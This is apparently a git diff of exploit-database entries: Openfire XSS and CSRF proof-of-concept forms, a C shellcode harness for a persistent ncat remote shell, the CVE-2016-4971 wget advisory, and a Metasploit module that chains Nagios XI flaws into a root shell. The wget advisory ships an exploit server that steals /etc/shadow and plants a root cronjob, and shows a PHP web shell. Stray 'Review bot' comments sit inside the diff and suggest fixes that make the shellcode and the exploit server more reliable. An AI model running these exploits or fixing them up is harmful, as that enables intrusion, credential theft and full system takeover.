+ + +``` + +#### *propValue* variable from *server-properties.jsp* + +The following curl command allows reproducing the attack against the Openfire *server-properties.jsp* page: + +``` +curl --data="propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property" http://OpenFireServerIP:9090/server-properties.jsp --cookie="JSESSIONID=XXX" +``` + +The folling code allows exploiting the vulnerability: + +``` + +
+ + + + +
+ + +``` + + +###Affected versions + +* Version 4.0.0 and 4.0.1 + + +## Several CSRF Vulnerabilities identified in Openfire 3.10.2 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-312 + +**CVSS Base Score**: 5.4 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Throught this attack an attacker could drive a valid user to execute unwittingly a request on the OpenFire sever. + + +### Proof of Concept + +#### *connection-settings-external-components.jsp* page is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page: + +``` + +
+ + + + + + + +
+ + +``` + + +#### *client-connections-settings.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page: + +``` + +
+ + + + + + + +
+ + +``` + +#### *manage-updates.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the *Openfire manage-updates.jsp* page: + +``` + +
+ + + + + + +
+ + +``` + +#### *plugin-admin.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *plugin-admin.jsp* page. + +``` + +
+ +
+ + + +``` + +The following HTML iframe command allows reproducing the attack against the Openfire *reg-settings.jsp* page: + +``` + +
+ + + + + + +
+ + + +``` + +#### *server-properties.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *server-properties.jsp* admin page. + +``` + +
+ + + + +
+ + +``` + +#### *system-email.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *system-email.jsp* admin page. + +``` + +
+ + + + + + +
+``` + +### Affected versions + +* Version >= 3.10.2 and < 4.0.0 + + +## Several CSRF Vulnerabilities identified in Openfire 3.10.2 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-312 + +**CVSS Base Score**: 5.4 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Through this attack, an attacker could drive a valid user to execute unwittingly a request to the OpenFire sever. + +These vulnerabilities have already been found by hyp3rlinx, but had not been patched yet. + +### Proof of Concept + +#### *connection-settings-external-components.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page: + +``` + +
+ + + + + +
+ + +``` + +#### *client-connections-settings.jsp* is vulerable to a CSRF attack. + +The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page. + +``` + +
+ + + + +
+ + +``` + +### Affected versions + +* Version 4.0.0 and 4.0.1 + + +## Sensitive information disclosure in OpenFire Server <=3.10.2 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-200 + +**CVSS Base Score**: 5.5 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +A sensitive information disclosure vulnerabilty is present in the page *system-email.jsp*. It allow's an authenticated user to retreive the md5 hash the password of an email account. + +### Vulnerable code + +The following HTML code is reveived by an authenticated user on the page system-email.jsp. The md5 hash of the password is sent to the user. + +``` + + + Server Username (Optional): + + + + + + + + Server Password (Optional): + + + + + +``` + + +### Affected versions + +* Version >=3.10.2 and <4.0.2 + +### Fixes + +* https://github.com/igniterealtime/Openfire/pull/570 + +### Solution + +Update to version 4.0.2 + +### Timeline (dd/mm/yyyy) + +* 15/10/2014 : Initial discovery +* 19/10/2015 : Contact with vendor team +* 27/11/2014 : vendor fixes vulnerabilities +* 27/11/2014 : vendor releases version 4.0.2, which includes the fixes + +## Credits + +* Florian Nivette + + + + +-- SYSDREAM Labs GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/40061.c b/platforms/lin_x86-64/shellcode/40061.c new file mode 100755 index 000000000..8e05b5251 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/40061.c 
@@ -0,0 +1,81 @@ +#include +#include + +// Exploit Title: [Linux 64bit Ncat + SSL + MultiChannel + Persistant + Fork + IPv4/6 + Password 176byte] +// Date: [7/5/2016] +// Exploit Author: [CripSlick] +// Tested on: [Kali 2.0] +// Version: [Ncat: Version 7.01] + +// ShepherdDowling@gmail.com +// OffSec ID: OS-20614 +// http://50.112.22.183/ + +//--------------------------------------------------------------------------------- +// ALERT TO SETTINGS: If Fork is ON and MultiChannel is ON, you will need to either +// kill the PID or restart the computer in order to remove the RAT. That is why +// password and encryption is VERY important here. +//--------------------------------------------------------------------------------- + +// Default Use +// ncat --ssl -6 1000::66 9999 --proxy-auth creepin[:LaCrips] -v + +// Any Use +// ncat --ssl -(4/6) (IPv4/IPv6) --proxy-auth [:] -v + +//--------------------------------------------------------------------------------- + + +// Internet Protocol Version +// IPv6 = \x36 +// IPv4 = \x34 +#define IP "\x36" + +// Username (Any Byte Size) +#define Username "\x63\x72\x65\x65\x70\x69\x6e" + +// Password (Any Byte Size) +#define Password "\x4c\x61\xee\x43\x72\x69\x70\x73\x5d" + +// Port (4 bytes) +// ascii (from 0 to 9) = 30, 31, 32, 33, 34, 35, 36, 37, 38, 39 +#define Port "\x39\x39\x39\x39" + + +// MultiChannel & Non-Ceasing (persistant until terminal close unless Fork is on) +// on = \x6b +// off = \x76 +#define MultiChannel "\x6b" + + +// Fork allows the program to run after terminal close (I suggest MultiChannel on) +// Fork helps when linking payload to an innocuous program +// comment the fork out if you don't want it +#define Fork "\x6a\x39\x58\x48\x31\xff\x0f\x05\x48\x31\xff\x48\x39\xf8\x74\x08\x48\x31\xc0\x6a\x3c\x58\x0f\x05" + + + +unsigned char code[] = + +"\x48\x31\xff\x48\xf7\xe7"Fork 
+"\x68\x2f\x6e\x63\x61\xc6\x44\x24\x04\x74\x48\xbf\x2f\x75\x73\x72\x2f\x62\x69\x6e\x57\x48\x89\xe7\x50\x68\x2d\x2d\x73\x73\xc6\x44\x24\x04\x6c\x49\x89\xe6\x50\x49\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x57\x49\x89\xe7\x68\x2d"MultiChannel"\x76\x65\x49\x89\xe3\xeb\x3b\x48\x89\xe3\x68\x61\x75\x74\x68\x48\xb9\x2d\x2d\x70\x72\x6f\x78\x79\x2d\x51\x48\x89\xe1\x68"Port"\x49\x89\xe5\x68\x2d\x6c"IP"\x70\x49\x89\xe2\x50\x41\x56\x41\x57\x41\x53\x53\x51\x41\x55\x41\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05\xe8\xc0\xff\xff\xff"Username"\x5b\x3a"Password +; + +int main () +{ + // I make sure there are no nulls + // The string count will terminate at the first \x00 + printf("The Shellcode is %d Bytes Long\n", strlen(code)); + + // Next I throw 0xAAAAAAAA into every register before shellcode execution + // This ensures that the shellcode will run in any circumstance + + __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t" + "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" + "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" + "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t" + "call code"); + return 0; +} + diff --git a/platforms/linux/remote/40064.txt b/platforms/linux/remote/40064.txt new file mode 100755 index 000000000..204d64854 --- /dev/null +++ b/platforms/linux/remote/40064.txt 
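Review bot: The `Password` bytes `\x4c\x61\xee\x43\x72\x69\x70\x73\x5d` decode to `La\xeeCrips]`, which does not match the documented default `creepin[:LaCrips]` in the usage comment — `\xee` is not an ASCII character, so a client typing the documented credential will be rejected; either the byte or the comment needs correcting. The `printf` in main passes `strlen(code)` (a `size_t`) to `%d`; `printf("The Shellcode is %zu Bytes Long\n", strlen(code));` is the correct specifier. The harness jumps into the `code[]` array with `call code`, which only works when the binary is built with an executable data segment (the usual `-z execstack` shellcode-test build), so a build line such as `// gcc -fno-stack-protector -z execstack 40061.c -o ncat_shell` belongs in the header comments next to "Tested on". Finally, the password protection the ALERT comment relies on is `--proxy-auth` on a plain `-l` listener with no `--proxy-type`; I cannot confirm from the listing that ncat 7.01 enforces it in that mode, so that should be verified before it is trusted as the only access control on a persistent, forked listener.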
@@ -0,0 +1,495 @@ +============================================= +- Release date: 06.07.2016 +- Discovered by: Dawid Golunski +- Severity: High +- CVE-2016-4971 +============================================= + + +I. VULNERABILITY +------------------------- + +GNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution + + +II. BACKGROUND +------------------------- + +"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and +FTP, the most widely-used Internet protocols. +It is a non-interactive commandline tool, so it may easily be called from +scripts, cron jobs, terminals without X-Windows support, etc. + +GNU Wget has many features to make retrieving large files or mirroring entire +web or FTP sites easy +" + +https://www.gnu.org/software/wget/ + + +III. INTRODUCTION +------------------------- + +GNU Wget before 1.18 when supplied with a malicious URL (to a malicious or +compromised web server) can be tricked into saving an arbitrary remote file +supplied by an attacker, with arbitrary contents and filename under +the current directory and possibly other directories by writing to .wgetrc. +Depending on the context in which wget is used, this can lead to remote code +execution and even root privilege escalation if wget is run via a root cronjob +as is often the case in many web application deployments. +The vulnerability could also be exploited by well-positioned attackers within +the network who are able to intercept/modify the network traffic. + + +IV. DESCRIPTION +------------------------- + +Because of lack of sufficient controls in wget, when user downloads a file +with wget, such as: + +wget http://attackers-server/safe_file.txt + +an attacker who controls the server could make wget create an arbitrary file +with an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect +containing FTP server reference in response to the victim's wget request. 
+ +For example, if the attacker's server replies with the following response: + +HTTP/1.1 302 Found +Cache-Control: private +Content-Type: text/html; charset=UTF-8 +Location: ftp://attackers-server/.bash_profile +Content-Length: 262 +Server: Apache + +wget will automatically follow the redirect and will download a malicious +.bash_profile file from a malicious FTP server. +It will fail to rename the file to the originally requested filename of +'safe_file.txt' as it would normally do, in case of a redirect to another +HTTP resource with a different name. + +Because of this vulnerability, an attacker is able to upload an arbitrary file +with an arbitrary filename to the victim's current directory. + +Execution flow: + +victim@trusty:~$ wget --version | head -n1 +GNU Wget 1.17 built on linux-gnu. + +victim@trusty:~$ pwd +/home/victim + +victim@trusty:~$ ls +victim@trusty:~$ + +victim@trusty:~$ wget http://attackers-server/safe-file.txt +Resolving attackers-server... 192.168.57.1 +Connecting to attackers-server|192.168.57.1|:80... connected. +HTTP request sent, awaiting response... 302 Found +Location: ftp://192.168.57.1/.bash_profile [following] + => ‘.bash_profile’ +Connecting to 192.168.57.1:21... connected. +Logging in as anonymous ... Logged in! +==> SYST ... done. ==> PWD ... done. +==> TYPE I ... done. ==> CWD not needed. +==> SIZE .bash_profile ... 55 +==> PASV ... done. ==> RETR .bash_profile ... done. +Length: 55 (unauthoritative) + +.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s + +2016-02-19 04:50:37 (1.27 MB/s) - ‘.bash_profile’ saved [55] + + +victim@trusty:~$ ls -l +total 4 +-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile +victim@trusty:~$ + + +This vulnerability will not work if extra options that force destination +filename are specified as a paramter. 
Such as: -O /tmp/output +It is however possible to exploit the issue with mirroring/recursive options +enabled such as -r or -m. + +Another limitation is that attacker exploiting this vulnerability can only +upload his malicious file to the current directory from which wget was run, +or to a directory specified by -P option (directory_prefix option). +This could however be enough to exploit wget run from home directory, or +within web document root (in which case attacker could write malicious php files +or .bash_profile files). + +The current directory limitation could also be bypassed by uploading a .wgetrc +config file if wget was run from a home directory. + +By saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget +settings such as destination directory for all downloaded files in future, +as well as set a proxy setting to make future requests go through a malicious +proxy server belonging to the attackers to which they could send further +malicious responses. + + +Here is a set of Wget settings that can be helpful to an attacker: + +dir_prefix = string + Top of directory tree—the same as ‘-P string’. + +post_file = file + Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as ‘--post-file=file’. + +recursive = on/off + Recursive on/off—the same as ‘-r’. + +timestamping = on/off + Allows to overwrite existing files. + +cut_dirs = n + Ignore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option). + +http_proxy + HTTP Proxy server + +https_proxy + HTTPS Proxy server + +output_document = file + Set the output filename—the same as ‘-O file’. + +input = file + Read the URLs from string, like ‘-i file’. + +metalink-over-http + Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. + Then it switches to Metalink download. 
If no valid Metalink metadata is found, it falls back to ordinary HTTP download. + + + +Full list of .wgetrc options can be found in: + +https://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands + + + +V. PROOF OF CONCEPT EXPLOIT +------------------------- + + +1) Cronjob with wget scenario + +Often wget is used inside cronjobs. By default cronjobs run within home +directory of the cronjob owner. +Such wget cronjobs are commonly used with many applications used to download +new version of databases, requesting web scripts that perform scheduled tasks +such as rebuilding indexes, cleaning caches etc. +Here are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on +the Internet with exploitable wget cronjobs: + +https://codex.wordpress.org/Post_to_your_blog_using_email +https://docs.moodle.org/2x/ca/Cron +http://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site +http://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel + +Such setup could be abused by attackers to upload .bash_profile file through +wget vulnerability and run commands in the context of the victim user upon +their next log-in. + +As cron runs priodically attackers, could also write out .wgetrc file in the +first response and then write to /etc/cron.d/malicious-cron in the second. +If a cronjob is run by root, this would give them an almost instant root code +execution. + + +It is worth noting that if an attacker had access to local network they could +potentially modify unencrypted HTTP traffic to inject malicious 30X Redirect +responses to wget requests. + +This issue could also be exploited by attackers who have already gained +access to the server through a web vulnerability to escalate their privileges. 
+In many cases the cron jobs (as in examples above) are set up to request +various web scripts e.g: +http://localhost/clean-cache.php + +If the file was writable by apache, and attacker had access to www-data/apache +account, they could modify it to return malicious Location header and exploit +root cronjob that runs the wget request in order to escalate their privileges +to root. + + +For simplicity we can assume that attacker already has control over the server +that the victim sends the request to with wget. + +The root cronjob on the victim server may look as follows: + +root@victim:~# cat /etc/cron.d/update-database +# Update database file every 2 minutes +*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1 + + +In order to exploit this setup, attacker first prepares a malicious .wgetrc +and starts an FTP server: + +attackers-server# mkdir /tmp/ftptest +attackers-server# cd /tmp/ftptest + +attackers-server# cat <<_EOF_>.wgetrc +post_file = /etc/shadow +output_document = /etc/cron.d/wget-root-shell +_EOF_ + +attackers-server# sudo pip install pyftpdlib +attackers-server# python -m pyftpdlib -p21 -w + + +At this point attacker can start an HTTP server which will exploit wget by +sending malicious redirects to the victim wget's requests: + +---[ wget-exploit.py ]--- + +#!/usr/bin/env python + +# +# Wget 1.18 < Arbitrary File Upload Exploit +# Dawid Golunski +# dawid( at )legalhackers.com +# +# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt +# +# CVE-2016-4971 +# + +import SimpleHTTPServer +import SocketServer +import socket; + +class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): + def do_GET(self): + # This takes care of sending .wgetrc + + print "We have a volunteer requesting " + self.path + " by GET :)\n" + if "Wget" not in self.headers.getheader('User-Agent'): + print "But it's not a Wget :( \n" + self.send_response(200) + self.end_headers() + self.wfile.write("Nothing to see 
here...") + return + + print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n" + self.send_response(301) + new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) ) + print "Sending redirect to %s \n"%(new_path) + self.send_header('Location', new_path) + self.end_headers() + + def do_POST(self): + # In here we will receive extracted file and install a PoC cronjob + + print "We have a volunteer requesting " + self.path + " by POST :)\n" + if "Wget" not in self.headers.getheader('User-Agent'): + print "But it's not a Wget :( \n" + self.send_response(200) + self.end_headers() + self.wfile.write("Nothing to see here...") + return + + content_len = int(self.headers.getheader('content-length', 0)) + post_body = self.rfile.read(content_len) + print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body) + + print "Sending back a cronjob script as a thank-you for the file..." + print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)" + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(ROOT_CRON) + + print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n" + + return + +HTTP_LISTEN_IP = '192.168.57.1' +HTTP_LISTEN_PORT = 80 +FTP_HOST = '192.168.57.1' +FTP_PORT = 21 + +ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n" + +handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) + +print "Ready? Is your FTP server running?" + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +result = sock.connect_ex((FTP_HOST, FTP_PORT)) +if result == 0: + print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT) +else: + print "FTP is down :( Exiting." 
+ exit(1) + +print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT + +handler.serve_forever() + + +---[ eof ]--- + + + +Attacker can run wget-exploit.py and wait a few minutes until the victim's server executes +the aforementioned cronjob with wget. + +The output should look similar to: + + +---[ wget-exploit.py output ]--- + +attackers-server# python ./wget-exploit.py + +Ready? Is your FTP server running? +FTP found open on 192.168.57.1:21. Let's go then + +Serving wget exploit on port 80... + + +We have a volunteer requesting /database.db by GET :) + +Uploading .wgetrc via ftp redirect vuln. It should land in /root + +192.168.57.10 - - [26/Feb/2016 15:03:54] "GET /database.db HTTP/1.1" 301 - +Sending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc + +We have a volunteer requesting /database.db by POST :) + +Received POST from wget, this should be the extracted /etc/shadow file: + +---[begin]--- +root:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7::: +daemon:*:16484:0:99999:7::: +bin:*:16484:0:99999:7::: +sys:*:16484:0:99999:7::: +sync:*:16484:0:99999:7::: +games:*:16484:0:99999:7::: +man:*:16484:0:99999:7::: +lp:*:16484:0:99999:7::: +...cut... +---[eof]--- + +Sending back a cronjob script as a thank-you for the file... +It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response) +192.168.57.10 - - [26/Feb/2016 15:05:54] "POST /database.db HTTP/1.1" 200 - + +File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) + +---[ output eof ]--- + + +As we can see .wgetrc got uploaded by the exploit. It has set the post_file +setting to /etc/shadow. +Therefore, on the next wget run, wget sent back shadow file to the attacker. 
+It also saved the malicious cronjob script (ROOT_CRON variable) which should +create a file named /root/hacked-via-wget, which we can verify on the victim's +server: + + +root@victim:~# cat /etc/cron.d/wget-root-shell +* * * * * root /usr/bin/id > /root/hacked-via-wget + +root@victim:~# cat /root/hacked-via-wget +uid=0(root) gid=0(root) groups=0(root) + + + +2) PHP web application scenario + +If wget is used within a PHP script e.g.: + + + +An attacker who manages to respond to the request could simply upload a PHP +backdoor of: + + + +by using the wget-exploit script described in example 1. + +After the upload he could simply execute the script and their shell +command by a GET request to: + +http://victims-php-host/geoip/webshell.php?cmd=id + + +VI. BUSINESS IMPACT +------------------------- + +Affected versions of wget that connect to untrusted (or compromised) web +servers could be tricked into uploading a file under an arbitrary name, or +even path (if wget is run from a home directory). +Depending on the context in which wget is used, this could lead to +uploading a web shell and granting the attacker access remote access to the +system, or privilege escalation. It could be possible for attackers to escalate +to root user if wget is run via root cronjob as it is often the case in web +application deployments and is recommended in some guides on the Internet. + +The vulnerability could also be exploited by well-positioned attackers within +the networ who are able to intercept/modify the network traffic. + + +VII. SYSTEMS AFFECTED +------------------------- + +All versions of Wget before the patched version of 1.18 are affected. + +VIII. SOLUTION +------------------------- + +Update to wget version 1.18 as advertised by the vendor at: + +http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html + +Linux distributions should update their wget packages. 
It is recommended +to update wget manually if an updated package is not available for your +distribution. + +IX. REFERENCES +------------------------- + +http://legalhackers.com + +http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt + +http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html + +http://www.ubuntu.com/usn/usn-3012-1/ + +https://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1 + +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971 + +X. CREDITS +------------------------- + +The vulnerability has been discovered by Dawid Golunski +dawid (at) legalhackers (dot) com +legalhackers.com + +XI. REVISION HISTORY +------------------------- + +06.07.2016 - Advisory released + +XII. LEGAL NOTICES +------------------------- + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. I accept no +responsibility for any damage caused by the use or misuse of this information. + diff --git a/platforms/linux/remote/40067.rb b/platforms/linux/remote/40067.rb new file mode 100755 index 000000000..b175ad956 --- /dev/null +++ b/platforms/linux/remote/40067.rb 
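Review bot: In wget-exploit.py, `self.headers.getheader('User-Agent')` returns None when a request carries no User-Agent header, so the `"Wget" not in …` test in both do_GET and do_POST raises a TypeError and the request aborts with a traceback instead of serving the decoy page; `if "Wget" not in self.headers.getheader('User-Agent', ''):` avoids that for scanners or curl runs with an empty agent. The server is also built as `SocketServer.TCPServer(...)` without `allow_reuse_address`, so restarting it on port 80 while the previous socket is in TIME_WAIT fails with EADDRINUSE; setting `SocketServer.TCPServer.allow_reuse_address = True` before constructing `handler` fixes it. For defenders reading the root-cron example, it is worth restating next to it that the advisory's own mitigation — forcing the destination with `-O` — is absent from the shown `wget -N http://attackers-server/database.db` job, which is exactly what makes the `.wgetrc` drop into the cron owner's home directory possible.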
@@ -0,0 +1,275 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Nagios XI Chained Remote Code Execution', + 'Description' => %q{ + This module exploits an SQL injection, auth bypass, file upload, + command injection, and privilege escalation in Nagios XI <= 5.2.7 + to pop a root shell. + }, + 'Author' => [ + 'Francesco Oddo', # Vulnerability discovery + 'wvu' # Metasploit module + ], + 'References' => [ + ['EDB', '39899'] + ], + 'DisclosureDate' => 'Mar 6 2016', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd cmd_bash', + 'RequiredCmd' => 'generic bash-tcp php perl python openssl gawk' + } + }, + 'Targets' => [ + ['Nagios XI <= 5.2.7', version: Gem::Version.new('5.2.7')] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_bash', + 'LHOST' => Rex::Socket.source_address + } + )) + end + + def check + res = send_request_cgi!( + 'method' => 'GET', + 'uri' => '/nagiosxi/' + ) + + return unless res && (html = res.get_html_document) + + if (version = html.at('//input[@name = "version"]/@value')) + vprint_status("Nagios XI version: #{version}") + if Gem::Version.new(version) <= target[:version] + return CheckCode::Appears + end + end + + CheckCode::Safe + end + + def exploit + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Vulnerable version not found! 
punt!') + end + + print_status('Getting API token') + get_api_token + print_status('Getting admin cookie') + get_admin_cookie + print_status('Getting monitored host') + get_monitored_host + + print_status('Downloading component') + download_profile_component + print_status('Uploading root shell') + upload_root_shell + print_status('Popping shell!') + pop_dat_shell + end + + # + # Cleanup methods + # + + def on_new_session(session) + super + + print_status('Cleaning up...') + + commands = [ + 'rm -rf ../profile', + 'unzip -qd .. ../../../../tmp/component-profile.zip', + 'chown -R nagios:nagios ../profile', + "rm -f ../../../../tmp/component-#{zip_filename}" + ] + + commands.each do |command| + vprint_status(command) + session.shell_command_token(command) + end + end + + # + # Exploit methods + # + + def get_api_token + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/includes/components/nagiosim/nagiosim.php', + 'vars_get' => { + 'mode' => 'resolve', + 'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \ + 'SELECT backend_ticket FROM xi_users WHERE user_id=1' \ + '),FLOOR(RAND(0)*2))x ' \ + 'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- ' + } + ) + + if res && res.body =~ /Duplicate entry '(.*?).'/ + @api_token = $1 + vprint_good("API token: #{@api_token}") + else + fail_with(Failure::UnexpectedReply, 'API token not found! punt!') + end + end + + def get_admin_cookie + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/rr.php', + 'vars_get' => { + 'uid' => "1-#{Rex::Text.rand_text_alpha(8)}-" + + Digest::MD5.hexdigest(@api_token) + } + ) + + if res && (@admin_cookie = res.get_cookies.split('; ').last) + vprint_good("Admin cookie: #{@admin_cookie}") + get_csrf_token(res.body) + else + fail_with(Failure::NoAccess, 'Admin cookie not found! 
punt!') + end + end + + def get_csrf_token(body) + if body =~ /nsp_str = "(.*?)"/ + @csrf_token = $1 + vprint_good("CSRF token: #{@csrf_token}") + else + fail_with(Failure::UnexpectedReply, 'CSRF token not found! punt!') + end + end + + def get_monitored_host + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/ajaxhelper.php', + 'cookie' => @admin_cookie, + 'vars_get' => { + 'cmd' => 'getxicoreajax', + 'opts' => '{"func":"get_hoststatus_table"}', + 'nsp' => @csrf_token + } + ) + + return unless res && (html = res.get_html_document) + + if (@monitored_host = html.at('//div[@class = "hostname"]/a/text()')) + vprint_good("Monitored host: #{@monitored_host}") + else + fail_with(Failure::UnexpectedReply, 'Monitored host not found! punt!') + end + end + + def download_profile_component + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/admin/components.php', + 'cookie' => @admin_cookie, + 'vars_get' => { + 'download' => 'profile' + } + ) + + if res && res.body =~ /^PK\x03\x04/ + @profile_component = res.body + else + fail_with(Failure::UnexpectedReply, 'Failed to download component! punt!') + end + end + + def upload_root_shell + mime = Rex::MIME::Message.new + mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"') + mime.add_part('1', nil, nil, 'form-data; name="upload"') + mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"') + mime.add_part(payload_zip, 'application/zip', 'binary', + 'form-data; name="uploadedfile"; ' \ + "filename=\"#{zip_filename}\"") + + res = send_request_cgi!( + 'method' => 'POST', + 'uri' => '/nagiosxi/admin/components.php', + 'cookie' => @admin_cookie, + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'data' => mime.to_s + ) + + if res && res.code != 200 + if res.redirect? && res.redirection.path == '/nagiosxi/install.php' + vprint_warning('Nagios XI not configured') + else + fail_with(Failure::PayloadFailed, 'Failed to upload root shell! 
punt!') + end + end + end + + def pop_dat_shell + send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php', + 'cookie' => @admin_cookie, + 'vars_get' => { + 'host' => @monitored_host, + 'end' => ';sudo ../profile/getprofile.sh #' + } + ) + end + + # + # Support methods + # + + def payload_zip + zip = Rex::Zip::Archive.new + + Zip::File.open_buffer(@profile_component) do |z| + z.each do |f| + zip.entries << Rex::Zip::Entry.new( + f.name, + (if f.ftype == :file + if f.name == 'profile/getprofile.sh' + payload.encoded + else + z.read(f) + end + else + '' + end), + Rex::Zip::CM_DEFLATE, + nil, + (Rex::Zip::EFA_ISDIR if f.ftype == :directory) + ) + end + end + + zip.pack + end + + # + # Utility methods + # + + def zip_filename + @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip' + end + +end \ No newline at end of file diff --git a/platforms/php/webapps/40058.txt b/platforms/php/webapps/40058.txt index 30405c510..961591a3a 100755 --- a/platforms/php/webapps/40058.txt +++ b/platforms/php/webapps/40058.txt @@ -1,3 +1,6 @@ +Advisory ID: ZSL-2016-5336 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php + eCardMAX 10.5 SQL Injection and XSS Vulnerabilities diff --git a/platforms/php/webapps/40059.txt b/platforms/php/webapps/40059.txt new file mode 100755 index 000000000..fad9bbc89 --- /dev/null +++ b/platforms/php/webapps/40059.txt 
